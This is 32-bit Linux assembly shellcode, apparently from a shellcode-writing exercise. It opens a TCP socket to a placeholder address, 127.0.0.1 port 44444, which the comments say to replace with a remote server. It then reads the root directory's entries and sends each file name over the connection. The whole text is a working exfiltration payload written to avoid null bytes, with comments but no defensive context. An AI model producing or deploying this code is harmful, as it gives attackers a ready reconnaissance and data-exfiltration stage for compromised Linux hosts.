BITS 32 section .text global _start _start: ; int socketcall(int call, unsigned long *args) syscall 0x66 ; sockfd = socket(socket_family = 2 (PF_INET), socket_type = 1 (SOCK_STREAM), protocol = 0) xor eax, eax mov al, 0x66 ; sys_socketcall xor ebx, ebx push ebx ; push 0 (protocol) inc ebx ; push ebx ; socket_type = 1 (SOCK_STREAM) inc ebx push ebx ; socket_family = 2 (PF_INET) dec ebx ; SYS_SOCKET ebx = 1 mov ecx, esp ; ecx contains reference to socket arguments we just pushed int 0x80 mov ebp, eax ; Save sockfd into ebp ; int socketcall(int call, unsigned long *args) syscall 0x66 ; connect(sockfd, &sockaddr, addrlen) xor eax, eax mov al, 0x66 ; sys_socketcall push DWORD 0x0101017f ; to avoid null bytes, replace this with remote server push WORD 0x9cad ; port 44444 inc ebx ; AF_INET = 2 push bx ; push AF_INET mov ecx, esp ; sockaddr pointer push BYTE 16 ; sizeof(sockaddr) = 16 push ecx ; pointer to sockaddr push ebp ; pointer to sockfd mov ecx, esp ; socket arguments to socketcall inc ebx ; SYS_CONNECT, ebx = 3 int 0x80 ; int openat(int dirfd, const char *pathname, int flags) syscall 0x127 xor eax, eax push eax ; push 0x2F2F2F2F; path"//// 0x00" mov ax, 0x127 ; syscall 0x127 openat mov bx, -100 ; dirfd = AT_FDCWD (behave like open()) mov ecx, esp ; reference to pathname we just pushed xor edx, edx ; flags = O_RDONLY (0) int 0x80 ; int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count) syscall 0x8d mov ebx,eax ; Store fd in EBX xor eax,eax mov al, 141 ; syscall 0x8d getdents xor edx,edx mov dx, 0xFFFF ; count (buffer size 65535) sub esp, edx ; reserve buffer mov ecx, esp ; point to the buffer (linux_dirent *dirp) int 0x80 xchg eax,edx ; EDX contains the bytes read from getdents ; LOOP on struct linux_dirent ; struct linux_dirent { ; unsigned long d_ino; /* Inode number */ ; unsigned long d_off; /* Offset to next linux_dirent */ ; unsigned short d_reclen; /* Length of this linux_dirent */ ; char d_name[]; /* Filename (null-terminated) */ ; /* length is actually (d_reclen - 2 - ; offsetof(struct linux_dirent, d_name)) */ ; /* ; char pad; // Zero padding byte ; char d_type; // File type (only since Linux 2.6.4); offset is (d_reclen - 1) ; */ ; } .LOOPDIRENT: test edx, edx ; check if we reached the end jz short .EXIT lea esi, [ecx+10] ; ESI contains buffer movzx eax, WORD [ecx+8] ; load d_reclen in eax to calc strlen of d_name sub edx, eax ; substract the size with the current linux_dirent size add ecx, eax ; calculate the next linux dirent address push edx ; save the number of bytes left push ecx ; save the next linux dirent address sub eax, 12 ; ulong + ulong + ushort + char + char = 12 mov edi, eax ; edi contains strlen of d_name add eax, esi ; eax points to end of d_name xor BYTE [eax], 0xa; overwrite null byte with newline for readability inc edi ; because of newline ;; int socketcall(int call, unsigned long *args) syscall 0x66 ;; ssize_t send(int sockfd, const void *buf, size_t len, int flags); xor eax, eax push eax ; flags = 0 mov al, 0x66 ; sys_socketcall push edi ; buf_len push esi ; buf push ebp ; sockfd mov ecx, esp ; socket arguments to socketcall mov bl, 0x9 ; SOCKET_SEND int 0x80 add esp, 16 ; substract the 4 values we pushed in socketcall send pop ecx ; restore pop edx ; restore jmp short .LOOPDIRENT .EXIT: ; int exit(0) mov al, 1 xor ebx, ebx int 0x80